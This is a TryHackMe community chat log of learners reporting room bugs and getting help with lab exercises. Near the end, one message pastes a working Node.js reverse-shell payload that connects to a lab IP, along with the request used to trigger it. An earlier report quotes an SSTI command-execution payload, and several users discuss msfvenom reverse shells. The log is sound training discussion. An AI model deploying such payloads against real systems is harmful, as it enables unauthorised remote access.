sqlmap is not installed on the AttackBox, contrary to the room instructions.
When I install the sqlmap, the interface is now different and tool asks more questions during scan. It doesn't look like the instructions from Task 6.
The exploit no longer works, it's impossible to complete the Task 6.

If the version of the DB is the same, it's possible code to CHATAI is now changed and no longer vulnerable, or the version of PHP is different and no longer vulnerable. Apache seems to be the same version as in the task.

#

Or perhaps version of MariaDB is different

keen surge
#

yo

#

im on AOC

#

and when i start a machine it says i already started one

#

although i cant find any machine sessions anywhere

hexed thistle
quaint sparrow
wraith obsidian
spare scroll
spare scroll
# spare scroll I'll try again.

What is the version of sqlmap that you have? When I did apt update && apt install sqlmap I get the version 1.4.4. When I run the sqlmap I get this message:

root@ip-10-10-96-125:~# sqlmap -version
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: python3 sqlmap [options]

sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic and -hh for advanced help

[13:28:35] [WARNING] you haven't updated sqlmap for more than 1708 days!!!
spare scroll
#

It worked !!! Thanks @wraith obsidian

livid escarpBOT
#

Gave +1 Rep to @wraith obsidian (current: #831 - 5)

wraith obsidian
spare scroll
keen surge
#

i had to let the invisible machine time finish until i could start it agaom

tall flint
wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @tall flint (current: #1207 - 3)

zealous hound
#

Room: https://tryhackme.com/r/room/threatmodelling
Task 1: Introduction
Under prerequisites it still says Intro to Threat Emulation (coming soon!) instead of being linked to https://tryhackme.com/r/room/threatemulationintro

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

TryHackMe
Intro to Threat Emulation

A look into threat emulation practices as a means of cyber security assessment.

deep sonnet
#

I am trying to complete "OWASP Top 10 - 2021" learning path and in " Task 22
Server-Side Request Forgery (SSRF)", it's unable to upload found flag(thm{c4ni_haz...._......), displayed one not recognized by THM platform.😀

naive osprey
#

"If you want to [missing word] more about sandboxes, have a look at the room FlareVM: Arsenal of Tools."

somber venture
#

Hi everyone (pls excuse mistypings as my keyboard is rather ...effed rn)
I am doing the room "Web Enumeration" Task 6.

I have run gobuster with this exact command:
gobuster vhost -u http://webenum.thm -w subdomains-top1million-5000.txt -t 99

What I get in my terminal (zsh on macOS) is a lot of 400's :
see img.

I searched for a writeup, and a similar command (minus the -t 99 flag, which I also ran, not that it should chagne anything according to my current understandin) should turn up ... well spolier, not sure I should post it (not clear on the rules with that, but I did use the procided soln and the site accepted the answer).

My first question is if this is a room bug?
If not, I'm happy to learn what I'm not understanding and doing wrong.

But if it is a room bug, I'm not sure what I should propose as a suggestion for a fix.

thoughts?

image.png
#

I should note, the url is in my /etc/hosts file.

#

And to be clear, the answer to the question did not appear in the results of the scan.
I only got a bunch of 400's

misty gull
#

Also, seems like a bug in AoC24 - Task 8/Day2 - Question #2:
The only way to get the correct # of failed attempts is to use the exact window from the video - there were actually a pile of other failed attempts prior to the 29-Nov 00:00 start-time.
Consider (updating the hint?) or adding a note to clarify the time-window requirement πŸ™
https://tryhackme.com/r/room/adventofcyber2024

TryHackMe
Advent of Cyber 2024

Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas!

jovial trench
hexed thistle
outer quartz
#

I need help please

I've been getting error 504 on running task 2 that's the elastic SIEM tool and it's been giving me the same error message for the past 3days now

#

Advent of cyber day 2

coarse copper
#

Hello good day here, please is anyone here among the Lazarus group?

deft yarrow
livid escarpBOT
#

Gave +1 Rep to @misty gull (current: #194 - 37)

unborn flume
#

Quick note for https://tryhackme.com/r/room/networkingsecureprotocols Task 8:

First, after right-clicking anywhere, choose β€œProtocol Preferences.” From the submenu, select β€œTransport Layer Security.” Thirdly, click on β€œOpen Transport Layer Security preferences.”

right-clicking anywhere is not effective. "Transport Layer Security" will only appear as an option if you rc on a packet that actually used TLS in the first place.

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

topaz blade
spare mirage
supple chasm
#

I am getting an error when opening the VM associated with today's Advent challenge. When I start the VM I get an error that says "An error has occured and this action cannot be completed. If the problem persists, please notify your system administrator or check your system logs". Any idea what could be causing this? I have cleared out all cache and history in my browser to troubleshoot with no luck.

spare mirage
supple chasm
#

I have done that a few time too, but I will try it again. TY

final coral
#

I am facing an issue with the attack machine suddenly got disconnected, and when i asked echo it looks like there is an issue also in understanding my statement

Me: the attack machine suddenly disconnected what shall i do ?.
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.

Me: the attack machine suddenly disconnected
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.

Me: i am not able to connect to the attach machine
Echo: For the next tasks, you'll need to tackle without me! You got this! To keep interacting with me, please check any room in the Jr Penetration Tester Path.

quaint sparrow
final coral
tall flint
#

BUG: room/containervulnerabilitiesDG

Task 6 has incorrect text:
Generally speaking, a Docker container will have very processes running. This is because a container is designed to do one task. I.e., just run a web server, or a database.

It should be:
Generally speaking, a Docker container will have very few processes running. This is because a container is designed to do one task. I.e., just run a web server, or a database.

broken plover
#

I'm working on the room Fowsniff CTE right now and are these pastebin links supposed to be inaccessible?
it says pastebin took them down recently

#

I think it's making the room uncompletable but I might be missing something
one of the pages says it was taken down Aug 2024 so i thought maybe it has flown under the radar for 2 months

solid sierra
#

There is a massive problem in today's Advent of Cyber task that Microsoft Defender blocks the execution of the shellscript!

solid sierra
obsidian kiln
#

Lmfao. Right, okay, who forgot to disable Defender kek

shrewd basin
#

I was having the same problem, I was jumping the gun and had the payload using port 1111, I also made an oppsie and had the ip of the windows machine not my attack box in msfvenom setup. Make sure when you create the msfvenom payload you use your attack box ip and the port 4444, listen on port 4444 on your attack box . Then the last part put each in line in separately and hit enter. It then worked for me.

sharp narwhal
#

defender got smart

spare mirage
#

Copy last 4 lines of exploit - line by line

#

Also make sure you're using port 4444 πŸ™‚

spare mirage
frigid palm
#

I also triple checked that I am using the Attackbox IP and port 4444, so I am hoping it is not that

frigid palm
#

Ok, I just restarted everything, did something for an hour, and it works now

hexed thistle
frigid palm
#

Maybe but I’m pretty sure the way I transferred it caused an issue. The clipboard wasn’t showing up on the Windows VM and Ctrl-Shift-C didn’t seem to work, so I did the logical thing.

  1. Double encoded shell code in Base64
  2. Pasted code blocks and encoded shellcode into different files.
  3. Hosted files with http.server
  4. Accessed files on Windows machine
  5. Decoded shellcode
  6. Pasted shellcode into search bar to remove unwanted characters.
  7. Attempted to run code as intended from there
#

When it worked, I RDPed in with the AttackBox and just pasted everything normally

#

Like a hooligan

#

I also may be slightly delirious right now lol

native lynx
#

I want to become a hacker, what should I do?

ember dove
#

Hey guys ! I'm creating my own room for a workshop at school ! I create my VM on virtualbox and export it in .ova to deploy it on Tryhackme but it is unreachable, I ping it, try to connect in ssh, nmap it... nothing on the ip given by the site when I start the machine ? Can somenone help me ? is there a special configuration for tryhackme ?

spare mirage
ember dove
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 1052)

shrewd basin
fierce kite
#

Hi, could someone please confirm if this is a bug? And the way around!

Room - Windows Incident Surface
Issue - Task 3 Target machine is not accessible- 'WIN-Insident-Surface_v1.5A'

  • The machine starts but the window doesn't split
  • Can't access through ssh ( baseline says ssh is disabled)
  • Cleared browser cache but no luck.

Thanks..

glad badger
teal mist
#

Room - Unified Kill Chain. Weaponization has been changed to Resource Development in the current version of the Unified Kill Chain.

frozen barn
#

Hello

I would like to point out that the Bandit room was down yesterday, the vulnerable web server not accessible and then the powershell configuration file not present.

steel solstice
#

DAY 3: my firefox browser in the attackbox is saying 'unable to connect' when i paste the beginning URL 'http://10.10.30.101:5601/' - Can someone please help??

topaz blade
#

DAY 3: I searched for the available clientip values and only saw ::1, 10.9.98.230 and 10.13.27.115

it was only until I looked at the screenshots that I found a hit with the correct clientiip

spare mirage
topaz blade
#

I understand I'm not supposed to, but When I put no filters, oct 1 0:00 to oct 2 0:00 and tried to go through the clientips through the attackbox the ip value that I was supposed to find didn't appear, both before and after searching for the shell.pup in the message column

spare mirage
topaz blade
#

my attackbox ran out of time i'll try that tomorrow

quaint sparrow
#

You don't need the attackbox for this task

#

Or a VM.

brisk garnet
#

In the room Caldera , when i run command python3 server.py --insecure, the terminal respond multiple issues about missing modules. even after installing the modules e.g. pip install sphinx-rtd-theme , pip install myst-parser ,etc. when i use the web browser to access http://attacker_IP:8888 . the web page displays " 500 Internal Server Error
Server got itself in trouble " NotLikeThis

late plank
#

Has anyone been able to get through GoldenEye recently? The RCE via the spell checker doesn't appear to be functioning anymore as the spell checker never loads. Also, the tabs on the left side, such as Blogs, cannot be expanded. I've had to go through the source code to grab links to access the different categories

unborn flume
#

Suggestion for MonikerLink room Task 3: update the instructions to explicitly say to replace the ATTACK_MACHINE placeholder with the appropriate IP.

When I copy pasted the PoC I started from the docstring, rather than the first line of actual code. The result is that line 12 contains "victim@monikerlink.thm" and modifying the MonikerLink in line 12 renders the email undeliverable.

If the initial docstring is included in the copy paste operation (as the included gif shows) the correct replacement is on line 17. Starting from the the first line of code (the first import) correctly places the actual MonikerLink on line 12.

#

That is all for your DOTD (Derp of the Day)

cobalt lily
#

When I try to keep on the attack on intruder in the burpsuite intruder pratical example i make the attack and in the response all the username and password have the same length, so I can’t find the answer I need. How this is possible?

final nebula
#

https://tryhackme.com/r/room/publickeycrypto Task 6. Does not accept the answer "LetΒ΄s encrypt". Also tried "Lets encrypt" and others. but does not work. Checked youtube and other playforms, and it should work with no issues.

spare mirage
wise trout
glad sparrow
#

Maybe I'm doing something totally wrong but the room Opacity seem bugged to me.

Whatever I upload, it's always a 404 response, even with valid images. Is it broken and should I stop trying? Or am I doing something wrong and do I just need to try some more?

https://tryhackme.com/r/room/opacity

spare mirage
waxen geyser
#

Room: Sysmon, Task 3, Starting Sysmon. Command in screenshot point to ..\Configuration\ foder. Given VM to this room don't have this folder. But there is folder with "s" at the end: ..\Configurations.

wise trout
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 1169)

strong jasper
#

Room: https://tryhackme.com/r/room/training
Problem: "An unknown error has occurred" when clicking on submit/complete buttons at task 3, 4 and 5
Play by play:

  1. Access room "Training Impact on Teams"
  2. Task 3 "Write a Cyber Security Training Investment Proposal"
  3. Q: What would be the savings due to the increased productivity?
    A: 40000
    click on "submit" and get "An unknown error has occurred"
  4. Q: Assuming that training costs $500 per employee, what is the Return on Investment?
    A: 400%
    click on "submit" and get "An unknown error has occurred"
  5. Task 4 "Vendor Selection"
    click on "complete" and get "An unknown error has occurred"
  6. Task 5 "Conclusion"
    click on "complete" and get "An unknown error has occurred"
TryHackMe
Training Impact on Teams

Discover the impact of training on teams and organisations.

smoky citrus
#

I'm trying to answer a question on try hack me Cybersecurity 101> search skill

" What's the netstat parameter in MS window that displays the executable associated with each active connection and listening port"

I typed netstat-b as the answer, and it kept saying wrong answer.

spare mirage
#

πŸ™‚

#

-b is paramater , netstat is a command

smoky citrus
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 1186)

fierce birch
final nebula
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 1187)

fierce birch
#

Room https://tryhackme.com/r/room/owasptop10 task 22 (Insecure Deserialization - Objects) has some misleading statements about objects (in OO programming):

"Lamps can have different types of bulbs, this would be their state, as well as being either on/off - their behaviour!"

Followed by the question "if a dog was sleeping, would this be": A) A State, or B) A Behaviour. One could argue that a Dog.Sleep() method would be behavior, but if you're mostly flipping a boolean property then it's mostly just state. Just like the lamp being on/off.

quaint sparrow
# fierce birch Room https://tryhackme.com/r/room/owasptop10 task 22 (Insecure Deserialization -...

This really comes down to the model of design.

State for the for lamp could be On/off + Which type of bulb (Normal, Energy saving)

Dog.Sleep would be a change of state unless there a sequence of actions.

One could argue that a Dog.Sleep() method would be behavior, but if you're mostly flipping a boolean property then it's mostly just state. Just like the lamp being on/off.

This just makes it look like you've fed in to AI and got the response.

fierce birch
fierce birch
#

I just want to help improve the content, once in a while, when I find something that is a bit off.

quaint sparrow
fierce birch
#

So is it okay to report content errors as room bugs?

quaint sparrow
#

Yes.

high chasm
#

there are 2 rooms which redirect to the same url

image.png
charred mica
#

Hello, I have an issue with the Whiterose room.

Despite waiting for over 30 minutes, I can't access the site, either through AttacBox or my own machine with VPN enabled. Am I perhaps doing something wrong?
I’m getting the following message:

Hmm. We’re having trouble finding that site.
We can’t connect to the server at cyprusbank.thm

spare mirage
charred mica
#

Yes

wheat fractal
#

tryhackme's linux fundamentals 2 room has a problem in the terminal on my account. The 2nd task says to open the terminal and connect to the IP address given with the attackbox. I used ssh tryhackme@IP address but once it asks for the password it keeps saying it's wrong even though the second task says the password is tryhackme too, I could connect to it 2 days ago but now I can't. I tried to close the attackbox and restart it with a new IP but didn't work. Even tried to refresh the page and close the tab and open it again but still seems like a problem. How to fix it ?

image.png
fringe pagoda
wheat fractal
livid escarpBOT
#

Gave +1 Rep to @fringe pagoda (current: #670 - 7)

fringe pagoda
wheat fractal
fringe pagoda
wheat fractal
#

Oh wait. I think I found out why...

#

I forgot to start my target machine, used the IP of the terminal itself... I'm so dumb sorry lol

#

Yeah, just did it.

fringe pagoda
#

glad, it worked

wheat fractal
#

Thanks for helping ^^

fringe pagoda
#

you are welcome bro

left hemlock
#

Hey. I’m doing the enumeration and brute forcing room where there are labs that require to go to enum.thm but the server seems down

spare mirage
nocturne lily
#

https://tryhackme.com/r/room/unattended

Hey the VM's in this room are seriously undersize (4gb of RAM) they are refusing to launch any of the Eric Zimmerman tools. I'm trying to start Registry Explorer and it's been trying to launch it for ages. Is there a way to get the collected artefacts files easily from the VM and use it on our own ?
Thanks in advance

normal yew
#

https://tryhackme.com/r/room/serversidetemplateinjection

I maybe wrong But I need to inform the fact that, In this room it has no well explain why we use {{"".__class__.__mro__[1].__subclasses__()[offset].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}} instead of {{"".__class__.__mro__[1].__subclasses__()[offset].('ls',stdout=-1).communicate()}} . Besides its claim offset 157 (see the picture bellow) is subprocess.Popen class offset and still use the first payload. I might be wrong but if I pass the extra .__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}} data (which I guess import subprocess) will always endup with error. So maybe the first payload will only work for "_sitebuiltins._Helper" class. Where I need to import subprocess externally. Kindly fix this info!!

--Room: Server-side template Injection
--task: 6

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

indigo cave
#

hi, aoc shell code vm didn't working

#

split screen isn't working

#

showing black screen

ornate walrus
#

ik heb een bug gevond op de room Advent of Cyber 2024 mij cijf is van 75 naar 69

urban crown
#

Hi

#

Any one help me to slove ctf

quaint sparrow
frank ore
#

Last room in the tryhackme path "VU23216 AT2 - Splunk Data Manipulation", the VM has no internet connection, other attack boxes and all other rooms seem to be fine.. but can't connect to Splunk in this room with no connection..

Note, I have restarted everything and logged back in, only to find the same issue.

Thanks,

next current
#

Start machine buttons, not active in the advent, what should I do ?

next nymph
next current
wanton marsh
#

Can someone help me here?

image.png
#
  1. I can't write the url afterwards
  2. If i click around and somehow get to write something and i press enter or any other key, nothing happens
spare mirage
small flare
#

learning path: cybersecurity101
room: Moniker Link (CVE-2024-21413)
Task 3:
trying to setup a responder, keep getting errors, tried multiple times. Saw an entry for the same error in this chat search. Was wondereing when it would be fixed or am i doing something wrong.

spare mirage
small flare
#

oh ok thank you.

dapper spruce
#

@spare mirage : Is it possible, that more machines are affected by those updates? I am trying to execute Room "Metasploit: Exploitation" and try to find vulnerabilities on my target machine. But the command "exploit", according to the example, tells me, there is no vulnerability and no sessions are being created. So i also can't finalize this exercise 😦

spare mirage
dapper spruce
#

Ok, but would have been better if there is a note that it is necessary to switch the machines

#

I am working on this for 2 hours now and thought problem was on my side.

spare mirage
dapper spruce
#

Ok, thanks for clarification

burnt orchid
spare mirage
burnt orchid
spare mirage
old prism
#

Oh, started working after almost 20 minutes.

left hemlock
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #7 - 1292)

spare mirage
unreal jasper
#

Can someone check the wreath room if it works I've been trying to join the room and for some reason it doesn't let me join

rugged canyon
unreal jasper
rugged canyon
tame karma
#

In AOC 2024, Task 18 (Day 12) it says, "Place the mouse cursor inside the request inside the Repeater tab in Burp Suite and press Ctrl+R to duplicate the tab. Press Ctrl+R ten times to have 10 duplicate requests ready for testing."

If you press controls-r 10 times, you have 11 duplicate requests. Also, it doesn't match the screenshot.

62a7685ca6e7ce005d3f3afe-1728628298525.png
coral nimbus
#

Hey everyone! having a small issue with the CyberChef: The Basics room. There is a download file and I am unable to download it, can't figure out why. Is this a bug?

spare mirage
spare mirage
coral nimbus
spare mirage
cobalt lily
#

Every time I start burpsuite’s browser it continuosly remain in stand-bay without let me access to the sites

spare mirage
cobalt lily
#

Ok

#

Then when i go try to complete the burpsuite intruder challenge (the last One) i make the macro and use the wordlists provided but strangely the username and password that afford to pass the login are not there. There are others, but not those wich are correct

#

I know it because i checked on YouTube the correct answer

spare mirage
cobalt lily
#

Yes but it’s strange because when I start the attack it’s too slow. Look, the problem is not i trust that i can’t find the credenzials, is that it’s simply too slow doing its work. Maybe it’s normal. I will see as it will go and then I will revise this question. I don’t know where’s the problem but I will find out. Thanks

spare mirage
cobalt lily
#

Ah so it’s normal! Lol, ok

spare mirage
wheat fractal
waxen geyser
#

Room: Wazuh, Task 3, typo in text: Once you navigate to this display, the intuitive wizard will be available to you. I have shared screenshots of using the wizard to install Wazhur's agent on both Windows and Debian/Ubuntu.

#

Room: Wazuh, Task 5, typo in questions: "Navigate to the "Modules" tab by pressing Wazuh -> Modules and open the "Policy Management" module like so:", but the module name is "Policy Monitoring".

wheat fractal
placid aspen
#

On AoC 2024 - Day 10, there is a potenital bug with the filename of the attachment. it won't process the attachment if there is a space in the name... "Secret Santa.docm" never connects. "SecretSanta.docm" works as expected. Room finished.. probably assumed everyone just used "invoice.docm" for the file name and I was being creative.

quaint sparrow
placid aspen
# quaint sparrow Did you fry using %20 ?

No i didn't.. I would never save a file with a %20 in it as an end user.. I'm just reporting that someone who is following the steps for the day, if they accidentally put a space in the filename, then the back end process which is opening the macro doc to do the connection fails. Then you wind up getting people posting on here about the reverse connection not occuring and they are told to retry.. if they don't change the filename for the attachment, it still won't work and they won't know why. so either the room docs need a clarity hint, or the back end process needs to escape the filename or something. At least, those would be my suggestions.

dark solar
#

For some reason I am getting DC while doing Yin & Yang from sidequests

#

IP for yin 10.10.180.108 IP for yang 10.10.215.101

#

I was connected over SSH

#

and they simply died

#

earlier today I had the same problem with yang

loud garnet
#

Hi, anyone encountered issues with Telnet segemtn of Networking Concepts room?
It asks for a flag after sending HTTP request through telletm but I get back code 400

#

telnet 10.10.97.191 80
Trying 10.10.97.191...
Connected to 10.10.97.191.
Escape character is '^]'.
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 17 Dec 2024 17:25:14 GMT
Server: lighttpd/1.4.63

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>400 Bad Request</title>
</head>
<body>
<h1>400 Bad Request</h1>
</body>
</html>
Connection closed by foreign host.

spare mirage
#

GET / HTTP/1.1

#

Host: telnet

#

Hit enter twice

loud garnet
#

Oh I see I misread, thought it will identify it on itself

#

thanks a lot πŸ™‚

tired dune
#

mm

floral saddle
#

I'm seeing the apache default page on a few different machines right now, ones that shouldn't have the default page to my knowledge. Affected machines are overpass and the 'team' ctf

prime tapir
#

Yea, Still need a fix/adjustment.

frigid palm
#

Hello, I am trying to complete the Persisting in Active Directory and my AttackBox does not have a PersistAD interface. It may have to do with the fact I needed to re-join the room. Please advise

tacit vessel
#

Room: Burp Suite: Intruder

TASK 10: INSTRUCTION NUMBER 8 - INSTEAD OF 'OK,' SHOULD CLICK 'X' BUTTON INSTEAD, IF 'OK,' NOT WORKING

sterile bridge
#

Hi

#

I From Bangladesh

heady adder
cobalt valve
#

Room: Upload Vulnerabilities

i do not get a reverse shell while using the attackbox on upload vulnerabilities task 11
i managed to upload the script to the server and to activate it but i still do not get the shell
I am using the attack box ip and the correct port

brittle dew
#

**Room: Defensive Security Intro **

For the virtual machine part in it when you input the ip addresses to block it doesnt work even though correct ones input. refreshed and tried many times but doesnt work

spare mirage
brittle dew
#

still not working

spare mirage
brittle dew
#

how do i send a screenshot

#

should i dm it to you

#

a photo

spare mirage
brittle dew
brittle dew
#

tried all 3 ip's no spaces at the end

#

nothing working

spare mirage
# brittle dew

You need to enter malicious IP from Step 1 , IPs from that list are already blocked πŸ™‚

brittle dew
#

oh

#

im slow

#

thank you

brittle dew
livid escarpBOT
#

Gave +1 Rep to @spare mirage (current: #5 - 1446)

quiet locust
#

For Walking an application, I am getting a 504 gateway timeout. Any ideas as to how I can get past it?

spare mirage
zinc parrot
#

not exactly a bug but i believe that the hint for the last question in task 27 for the advent of cyber event is wrong

#

it should be uploadfiles function not downloadandexecutefiles files function

frigid ruin
#

Room bug from advent of cyber task 14 Shellcodes the clipboard is awfully buggy and will reverse whatever you copy in. Also the windows vm seems quite unstable. If you need me to send some screen shots I can do so. Just want to help out to make sure if anyone else is doing this, they can finish it.

near current
pale niche
frigid ruin
#

Could i get temp access to upload a couple screenshots I toke this morning while I was trying to working on it.

mellow bolt
#

Also it's recommended to use your host device's clipboard/notes to move things like the shellcode back and forth.

frigid ruin
#

Toke these two this morning

mellow bolt
#

Were you posting those blocks individually?
And... seemingly out of order?

frigid ruin
#

no that's from the clipboard on the Windows vm. the very first block. we are supposed patse in from the walkthrough

frigid ruin
mellow bolt
#

You post everything from $VrtAlloc = @" to Add-Type $CrtThread in a single command line.

#

Then [Byte[]] $buf = {SHELLCODE} is its own command

#

Then each line after individually

pale niche
#

i'm getting the same thing

frigid ruin
#

Yes, placed the first block to the vm clipboard using CTL+SHIFT+ALT it has allowed me to paste it in to the clipboard recently. Then when I grab it from the clipboard it either is not there or as seen in my screenshot it reverses from code we are supposed to patse in. And then spits out an error in my other screenshot

mellow bolt
#

Oh it's the VM clipboard doing it?

frigid ruin
#

Yes correct

mellow bolt
#

Yeah I've heard they've been having issues with that.

#

The getaround if you're using a windows host machine is just to use something like notepad on your local, but not sure if you're connecting through a linux VM

#

what are you using to keep the string copied? just the default for kali?

frigid ruin
#

Yes, also have a file on my main security laptop running parrot security and got the same issue

mellow bolt
#

You might benefit from something like Obsidian for notes, but I don't know for sure if that'd fix the issue

frigid ruin
#

I have been using pluma on parrot sec

mellow bolt
#

What a weird problem to have, I wish I could be more useful

#

Have you tried copying to notepad in the windows VM first? You might be able to reorient the paste that way if it still comes out wrong

frigid ruin
#

Ok, I placed my bug report here to hopefully get this fixed for others and a possible workaround for this issue.

pale niche
#

welp i was able to somehow paste the code in correctly and get the revshell, but still no flag after a couple minutes. sigh. guess i'll come back back to this later

mellow bolt
#

So if you didn't do that, that might be why

mellow bolt
#

Room: OWASP Juice Shop

Issue 1: Instructions state to manipulate | "email" "[user]" | by replacing [user] with 1=1-- or ' to cause a closed email string and default to user0 (admin). Neither command worked, so ||I had to use ' OR TRUE -- which was able to force a SQL error.||

Issue 2: The recommended method of getting the persistent XSS flag by manipulating the Headers response in Burp for the ||True-Client-IP||, but this didn't seem to return the persistent flag. Recent versions of Juice don't seem to have Persistent XSS flags at all, so this might be a version issue?

tame karma
#

Hello. In the AOC24 room, Day 21 (Task 27), the connection card says the Attack Box is needed. This is incorrect. It is not needed, and is also no shown being used in the walkthrough video.

63588b5ef586912c7d03c4f0-1731050107820.png
#

I completed the task.

dusky junco
livid escarpBOT
#

Gave +1 Rep to @tame karma (current: #261 - 24)

pale niche
livid escarpBOT
#

Gave +1 Rep to @mellow bolt (current: #336 - 17)

pale niche
#

getting a blankscreen after the shellcodes vm boots up, tried 2x now. calling it a night, hopefully the elfs fix that one up.

stable dome
quaint sparrow
quaint sparrow
stable dome
#

yes I know but the thm portal doesn't accept the first answer

#

it accepts only the 2nd ans.

quaint sparrow
#

Yeah, the room was changed slightly when symbols were breaking answers.

stable dome
#

ohk, maybe add hint then. Ik it's ntg big but still

brisk garnet
#

A couple of users have reported the bug on CALDARA room, could TryHackMe fix the problems of the room and let us know when its all fixed?

unborn talon
# cobalt valve **Room: Upload Vulnerabilities** i do not get a reverse shell while using the a...

I'm seeing the same problem

curl http://jewel.uploadvulns.thm/content/FXF.jpg
function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4242, "10.6.26.175", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

POST http://jewel.uploadvulns.thm/admin?submit=failure HTTP/1.1
host: jewel.uploadvulns.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://jewel.uploadvulns.thm
Connection: keep-alive
Referer: http://jewel.uploadvulns.thm/admin?submit=failure
Upgrade-Insecure-Requests: 1
Priority: u=0, i

cmd=..%2Fcontent%2FFXF.jpg
quiet locust
wooden mirage
#

hey anyone knows..playing aoc someone got in the online room and starting typing ... he could play instead of me. in this kubernetes room.

last loomBOT
unborn pulsar
spare mirage
misty bison
#

Hello is it normal that sometimes a running machine shutdown with no reason ? A pop up says that the machine as terminated suddenly, without additional info.
Does the staff is notified about it ?

Quite frustrating when you pay for premium access πŸ™‚

spare mirage
misty bison
#

I mean, I'm ready to pay my subscription few euros more if it's more sustainable for THM

quaint sparrow
#

Not THM's.

misty bison
wild anchor
#

Room help, please: https://tryhackme.com/r/room/cicdandbuildsecurity
AttackBox doesn't see any of the machines on the Room's network. Waited ~ 20mins, have tried multiple times, including reset AttackBox. Pings timeout, ssh to mother times out, http connections time out.
Bug?

#

It seems the room's network is not visible from the AttackBox?

wheat fractal
#

The room "ORM Injection" (Web Application Pentesting > Injection Attacks > ORM Injection) might need a "Start AttackBox" button. There was content in the room which indicated using an attack system. My workaround was to simply start an AttackBox from another location. https://tryhackme.com/r/room/orminjection

TryHackMe
TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

lyric totem
#

Hello everyone, room help?
Room https://tryhackme.com/r/room/winadbasics - Active directory basics requires using RDP to connect to the Windows machine.
I want to use Remmina, but upon launching the app, this pops up:

#

<< Why cant I upload image ... >>

spare mirage
lyric totem
#

Yea, working on it πŸ™‚

#

There it is

Snimek_obrazovky_2024-12-23_181242.png
#

I tried "tryhackme" and "Password123", no luck

spare mirage
lyric totem
#

... okay ... all that effort πŸ™‚

swift quiver
#

To whom this may concern, Advent 2024 - Task 29: --rules=worldlist
This command has a typo, which is further fixed further into the room.

Not a huge issue, just thought to let it be known.

wraith obsidian
livid escarpBOT
#

Gave +1 Rep to @swift quiver (current: #2516 - 1)

green charm
#

Small markdown issue in the SOC simulator documentation πŸ‘€

image.png
native scaffold
#

I'm working on Task 14 (Day 8). I'm using my own computer as the attack box. I've got the reverse shell against port 4444, but no flag is appearing.

#

apparently, you need to connect on 1111 first, and then on 4444. I had gone straight to 4444.

wild anchor
#

It would be nicer if AoC Task #29 (Day 23) included instructions on how to pdftotext. It's supposed to be a walkthrough, after all.

quiet locust
quiet locust
unborn pulsar
# quiet locust Both.

Let me take a look when I get the chance later today and let you know if its works on my end.

spare mirage
obsidian kiln
#

Welcome to the internet. Everything is constantly being scanned at all times.
TryHackMe Attackboxes -- for some inane reason I have never quite figured out -- are exposed directly on the internet with public IP addresses (as opposed to being behind NAT).
Ergo, you'll find that your listeners get hit every so often if you bind to 0.0.0.0

#

If you want to avoid that, use the VPN rather than the attackbox (preferable anyway), or bind to your internal interface (whichever one has the 10.10.0.0/16 IP address)

frosty axle
full gulch
#

Hey is anyone experiencing an issue with OWASP 2021 task 20 ?

quiet locust
quiet locust
faint roost
#

I have trouble with azure portal logging me off everytime i try to log in

quiet locust
#

On The Sticker Shop, is it supposed to give me a 401 unauthorized message?

quaint sparrow
golden roost
#

Mother's secret, night regime usually shouldn't use black text...

image.png
prime tapir
#

I have a problem in SYSMON room task 4- cant run to command get win event for id =3 i did like stuffy24 did. Bot working. I copied and paste and edited not working one of the two happens or its getting stuck or getting like '>>' after pressing enter.

#

It's in powershell

#

Is there any problem with the SYSMON ROOM or it's just me?
I have just skipped that but I'm feeling dumb.
So please if someone can try with task 4 Q2+Q3 and let me know if it's me or something corrupted in the machine or something else.
I only started VM from there i tried all commands till T4-Q2+Q3 nothing had worked correctly (again may be my mistake). Thank you Marry Christmas.

short pebble
#

Room: Cybersecurity 101, Windows Powershell, Task 6.

The user it wanted me to enter, and the subsequent questions, were not on my target machine.

I had to look it up online to find it was looking for a user that didn't exist and sadly use their answers to progress.

#

The user I did have instead was "strategos"

#

Not sure why this happened, did my previous session fail to terminate, and it carried over a persistent session?

unborn pulsar
# quiet locust Both.

